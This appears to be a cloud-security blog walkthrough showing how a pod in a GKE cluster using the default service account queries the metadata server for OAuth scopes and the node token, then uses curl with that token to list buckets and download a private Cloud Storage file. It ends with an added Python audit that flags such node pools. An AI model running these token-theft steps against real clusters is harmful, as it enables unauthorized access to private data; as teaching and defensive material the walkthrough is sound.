Create a Cluster and Node Pool using the default service account
Create a pod and open a shell in it (the post calls this SSH):

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx

Create that nginx pod, then exec into it.
C:\Users\JMC\k8s>kubectl apply -f nginx.yml
pod/nginx created

C:\Users\JMC\k8s>kubectl exec -ti nginx bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
root@nginx:/#

Above shows we now have a root shell inside that pod.

Let's demonstrate why a GKE cluster and node pool running with the GCP default service account carries a very high security risk.

A pod can list the OAuth scopes of the node's service account simply by curling the GCP metadata API. The output below shows the pod holds scopes such as logging.write (write logs) and devstorage.read_only (read Cloud Storage), among others.
root@nginx:/# curl -s -H "Metadata-Flavor: Google" https://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.append

A pod can also obtain the GCP service account's access token from the same metadata API.

Let's perform a Server-Side Request Forgery (SSRF) attack!

Get the project ID. Below shows that the pod was able to obtain the project ID.
Get the GCP Cloud storage bucket names
curl -H "Authorization: Bearer TOKEN" "https://storage.googleapis.com/storage/v1/b?project=majestic-layout-340900"
So this is a private bucket with uniform bucket-level access (`uniformBucketLevelAccess` enabled), which means its files are protected from public access.

Below shows that the pod can nevertheless download a private file from the private bucket called `private-bucket1` using the node's token:
curl -H "Authorization: Bearer TOKEN" "https://storage.googleapis.com/storage/v1/b/private-bucket1/o/private.txt?generation=1648557043014755&alt=media" -o private.txt
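Added defensive check, not part of the original post: a Python audit over a cluster description in the shape of `gcloud container clusters describe --format=json` that flags the three conditions the walkthrough above relies on (node pool running as the Compute Engine default service account, a storage-read scope on the node token, and pods reaching the node metadata server directly instead of Workload Identity). The cluster dict, pool names and the gke-nodes@ account are constructed placeholders; that gcloud reports the default account as the literal string "default" is an assumption drawn from the GKE NodeConfig API.

```python
import re

# Cluster description in the shape of `gcloud container clusters describe --format=json`.
# CONSTRUCTED for this example: pool names and the gke-nodes@ account are placeholders.
SAMPLE_CLUSTER = {"name": "demo-cluster", "nodePools": [
    {"name": "default-pool", "config": {
        "serviceAccount": "default",
        "oauthScopes": ["https://www.googleapis.com/auth/devstorage.read_only",
                        "https://www.googleapis.com/auth/logging.write",
                        "https://www.googleapis.com/auth/monitoring",
                        "https://www.googleapis.com/auth/servicecontrol",
                        "https://www.googleapis.com/auth/service.management.readonly",
                        "https://www.googleapis.com/auth/trace.append"],
        "workloadMetadataConfig": {"mode": "GCE_METADATA"}}},
    {"name": "hardened-pool", "config": {
        "serviceAccount": "gke-nodes@example-project.iam.gserviceaccount.com",
        "oauthScopes": ["https://www.googleapis.com/auth/logging.write"],
        "workloadMetadataConfig": {"mode": "GKE_METADATA"}}}]}

# Scopes that let whoever holds the node token read Cloud Storage objects,
# which is exactly what the private-bucket download above relies on.
STORAGE_READ_SCOPES = {
    "https://www.googleapis.com/auth/devstorage.read_only",
    "https://www.googleapis.com/auth/devstorage.read_write",
    "https://www.googleapis.com/auth/devstorage.full_control",
    "https://www.googleapis.com/auth/cloud-platform",
}
# Assumption: gcloud reports the Compute Engine default account as "default" or by its email.
DEFAULT_COMPUTE_SA = re.compile(r"^(default|\d+-compute@developer\.gserviceaccount\.com)$")

def audit_node_pool(pool):
    """Return findings for one node pool; an empty list means none of the
    conditions used in the walkthrough above are present."""
    cfg = pool.get("config", {})
    findings = []
    if DEFAULT_COMPUTE_SA.match(cfg.get("serviceAccount", "default")):
        findings.append("runs as the Compute Engine default service account")
    bad = STORAGE_READ_SCOPES & set(cfg.get("oauthScopes", []))
    if bad:
        findings.append("node token can read Cloud Storage: " + ", ".join(sorted(bad)))
    if cfg.get("workloadMetadataConfig", {}).get("mode") != "GKE_METADATA":
        findings.append("pods reach the node metadata server directly; enable Workload Identity")
    return findings

def audit_cluster(cluster):
    """Map each node pool name to its findings."""
    return {p["name"]: audit_node_pool(p) for p in cluster.get("nodePools", [])}
```

Pipe real `gcloud ... describe --format=json` output through `json.load` and pass the result to `audit_cluster` to check your own clusters.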